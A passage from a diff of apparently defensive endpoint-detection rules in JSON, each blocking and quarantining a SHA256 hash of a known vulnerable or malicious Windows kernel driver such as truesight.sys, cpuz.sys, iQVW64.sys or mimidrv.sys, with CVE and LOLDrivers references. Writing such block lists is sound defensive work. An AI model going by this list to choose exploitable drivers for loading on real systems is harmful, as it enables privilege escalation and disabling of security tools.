"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457994Z", + "creation_date": "2026-03-23T11:45:30.457997Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458005Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "53810ca98e07a567bb082628d95d796f14c218762cbbaa79704740284dccda4b", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3386d7de-4380-535b-838c-95ef6f7b7108", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972107Z", + "creation_date": "2026-03-23T11:45:29.972109Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972115Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"d74755311d127d0eb7454e56babc2db8dbaa814bc4ba8e2a7754d3e0224778e1", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "33883177-ec4f-5290-a383-97f2258e163f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146062Z", + "creation_date": "2026-03-23T11:45:32.146065Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146070Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "85ca0dcdc52709de21281b8fc131a58440a045cf640643a6d96e5fee13a78b81", + "comment": "Malicious Kernel Driver (aka driver_85ca0dcd.sys) [https://www.loldrivers.io/drivers/e1c29414-5b5b-44f4-84cc-e6f55d9a23c6/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "338a3b19-4b6c-5fc8-b199-42d1ecf700d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500257Z", + "creation_date": "2026-03-23T11:45:31.500260Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500268Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "74c0a7245bdaeb9bd4caef2f87e85097ea5964e7a62e5f5fc7a929f4afbcd5cd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "338b240c-6a87-5ea9-841f-f0da16e5e201", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471831Z", + "creation_date": "2026-03-23T11:45:30.471834Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471843Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "68671b735716ffc168addc052c5dc3d635e63e71c1e78815e7874286c3fcc248", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "338c1220-6dcc-5557-9404-25f5baf30d72", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604925Z", + "creation_date": "2026-03-23T11:45:29.604927Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604933Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "69a4d67126186f9b29d0c12004c8b4a9e22afe30942448ade6696eb8b164b88f", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "338e0b0b-9d4a-5aa6-ba5d-8f2c846d183c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495115Z", + "creation_date": "2026-03-23T11:45:31.495117Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.495122Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f59d8602f4dfd43ce7126c574ca4dc1cf39867a60971c0d993a99044f15b48e1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "33937be4-b007-5c88-8e8b-a893c8cdde3f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477578Z", + "creation_date": "2026-03-23T11:45:30.477581Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477591Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "af16c36480d806adca881e4073dcd41acb20c35ed0b1a8f9bd4331de655036e1", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "339acd0f-f241-56e0-ac14-1572c93107c5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", 
+ "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613295Z", + "creation_date": "2026-03-23T11:45:29.613297Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613302Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "339c419c-886b-5690-b21f-955e21beff6d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833975Z", + "creation_date": "2026-03-23T11:45:30.833978Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833987Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1b89fa8308d44e0629bc159ab14b284145fdfe7e13d6fb2a81b6a378f31c32c1", + 
"comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "33a21463-c58a-5581-9793-1abf3dfee325", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456480Z", + "creation_date": "2026-03-23T11:45:30.456483Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456492Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d8096325bfe81b093dd522095b6153d9c4850ba2eaa790e12e7056ef160d0432", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "33a6a51f-10aa-5a22-a7a3-0e4d1e87c523", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.493221Z", + "creation_date": "2026-03-23T11:45:31.493223Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493229Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d4c3d7c95e4ed14c7adff853e1d36d976a5e05de0f9e37a409dd79224d921392", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "33a781ac-ff55-57b2-870d-0bd12217a5dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452981Z", + "creation_date": "2026-03-23T11:45:30.452984Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452994Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e279e425d906ba77784fb5b2738913f5065a567d03abe4fd5571695d418c1c0f", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"33bead4f-7b8d-51a5-b91f-ac49d23b4974", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611532Z", + "creation_date": "2026-03-23T11:45:29.611534Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611539Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eb6807c46e2d4808f07cca9242e7a59393fdab6ccf4da1aec124ef2a34398d43", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "33bf2257-58a5-5d53-9cb4-533d8d23da48", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616060Z", + "creation_date": "2026-03-23T11:45:29.616062Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.616067Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf", + "comment": "Phoenix Tech. vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "33bf7a9a-62b7-5784-b666-cad9b8135193", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469718Z", + "creation_date": "2026-03-23T11:45:30.469721Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469730Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81e0111c823599201e7e7054557017c0ba148dcd6d9fe74052efdee051c42e13", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "33c1b769-9fff-50f1-be6b-e085db693f68", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454007Z", + "creation_date": "2026-03-23T11:45:30.454010Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454019Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d9d4e7d594b4b318ac78baa79f119e4c85493eec1c1f939ae10b1633346c6e9e", + "comment": "Malicious Kernel Driver (aka a236e7d654cd932b7d11cb604629a2d0.sys) [https://www.loldrivers.io/drivers/2866bd72-a4b1-4764-a838-9ed0790c2631/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "33c853f9-12db-5799-bca7-3572f684e31e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471996Z", + "creation_date": "2026-03-23T11:45:30.471999Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472008Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"ff987c30ce822d99f3b4b4e23c61b88955f52406a95e6331570a2a13cbebc498", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "33d96035-f971-5ec9-ad33-943750c5fc82", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.496986Z", + "creation_date": "2026-03-23T11:45:31.496991Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497466Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c74ab60c598a4ec997f1d8fc232c56fa72394fc5ad3a69e0706aca3511806fc6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "33f29a55-a6f1-58c7-ad01-015e4f902143", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + 
},
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476144Z",
+ "creation_date": "2026-03-23T11:45:30.476147Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476157Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8138b219a2b1be2b0be61e5338be470c18ad6975f11119aee3a771d4584ed750",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33f3329e-7d12-5fe1-bc68-b53e0b6d3f6c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146884Z",
+ "creation_date": "2026-03-23T11:45:32.146886Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146892Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "efde1a896c24055780aefb6f1c5fee097b8dffbe79b7e2c26320f6fe7ea3b74d",
+ "comment": "Vulnerable Kernel Driver (aka BioNTdrv.sys) [https://www.loldrivers.io/drivers/e6378671-986d-42a1-8e7a-717117c83751/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "33f618e5-03da-56ee-b89c-c272c20d9cf6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458316Z",
+ "creation_date": "2026-03-23T11:45:30.458319Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458328Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "41eeeb0472c7e9c3a7146a2133341cd74dd3f8b5064c9dee2c70e5daa060954f",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34111be1-eea2-5913-bce6-8123f4af66cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474825Z",
+ "creation_date": "2026-03-23T11:45:30.474829Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474837Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4a525f5350be5a82cf4fb3546a914841642cda5deed7f9baa13d2912eed476fb",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "341e0c37-04bd-5a98-99aa-4aaa4f3a67e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820998Z",
+ "creation_date": "2026-03-23T11:45:31.821001Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821009Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aacc20d05f9d0874955364702d8c7e016f151a019f9d289390da7b99f7155c4f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "34294bee-e670-5b6e-9011-818c7ff09599",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815401Z",
+ "creation_date": "2026-03-23T11:45:31.815403Z",
+ "enabled": true,
+ "block_on_agent": true,
